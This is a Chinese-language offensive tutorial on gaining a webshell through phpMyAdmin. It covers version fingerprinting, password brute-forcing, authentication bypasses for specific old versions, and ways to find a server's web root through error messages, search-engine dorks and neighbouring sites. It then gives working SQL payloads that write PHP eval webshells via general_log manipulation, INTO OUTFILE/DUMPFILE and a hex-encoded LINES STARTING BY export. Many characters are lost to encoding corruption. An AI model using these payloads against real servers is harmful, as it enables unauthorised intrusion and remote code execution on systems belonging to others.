PHPMyadmin拿shell
基于PHPMyadmin的攻击
找到页面后,先判断版本:
登录框查看
也可以直接访问:/doc/html/index.html目录
口令爆破: burp等
远程代码执?等漏洞
后台bypass【万能密码】
phpmyadmin2.11.3-2.11.4 这两个版本存在万能密码,直接使?‘localhost’@‘@”为账号,密码不?输?。
phpmyadmin2.11.9.2 这个版本存在空口令。直接root??登陆,密码不?
GETSHELL(方法很多很多)
物理路径获取
报错?站代码问题报错 :?般就是加 ‘ 等特殊字符
解析器(Web容器、中间件)报错 如 IIS7.5:?般就是加?些不存在的?录名字
Google爆路径 结合关键字和site语法搜索出错
??快照,常?关键字有warning和fatal error。注意,如果?标站点 是?级域名,site接的是其对应的顶级域名,这样得到的信息要多得多。
Site:xxx.edu.tw warning Site:xxx.com.tw "atal error"
根据正常的安装?件猜 ?如phpstudy的默认?站?录是:c:/phpStudy/phpstudy/PHPTutorial/WWW/
读取解析器的配置?件
正常情况我们是?法得知解析器的配置?件的,这个时候就是尝试解析器默认的安装路径。
取巧假设某种情况下,我们得知?标是?的phpstudy,可是不是在默认的路径,我们就可以读取路径 select @basedir ,
得到路径后,推测?站路径。
旁站报错 你的?标是不报错的,但是不代表你的?标?站的邻居不报错啊。?如?标站是 www.target.com ,
它的邻居 是:www.victim.com ,邻居?站有注?,加 ‘ 后爆出它的?站某个??路径是:c:/wwwroot/victim/news.asp ,
那 你根据这个推荐你的?标站点的路径就有可能是 c:/wwwroot/target/ 。
其他信息phpinfo??
?站源码备份 ……
通过?志拿shell
原理,phpmyadmin有?个记录?志的?件,但是?般情况下会关闭,开启?志记录,然后设置?志记录名称为.php,
随便执? sql语句,只要包括?句话木?就会被写?到?志中去,然后就可以连接getshell。
set global general_log=‘on‘ //?先设置为on set global general_log_file ="E:\\wamp\\wamp\\www\\3.php" #执??条带有?句话??代码的SQL语句, 如: select ‘<?php eval($_POST[‘mima‘])?>;
导出拿shell
正常导出拿shell
- SELECT "<?php phpinfo();?>" INTO OUTFILE "E:\wamp\wamp\www\2.php"
- SELECT "<?php phpinfo();?>" INTO dumpFILE "E:\wamp\wamp\www\2.php"
创建表导出shell
CREATE TABLE a (cmd text NOT NULL);
INSERT INTO a (cmd) VALUES(‘<?php eval($_POST[1]);?>‘);
select cmd from a into outfile ‘D:/phpMyAdmin/libraries/d.php‘;
DROP TABLE IF EXISTS a;
猥琐型导出
select * from admin where userid=1 into outfile "x:\wwwroot\sx.php" LINES STARTING BY 0x3C3F70687020706870696E666F28293F3E%23
写完语句,要?hackbar的urlencode编码?下,不然很??率是不成功的哟。这个可以在基于MySQL的报错注?中 写webshell。
0x3C3F70687020706870696E666F28293F3E=<?php phpinfo()?>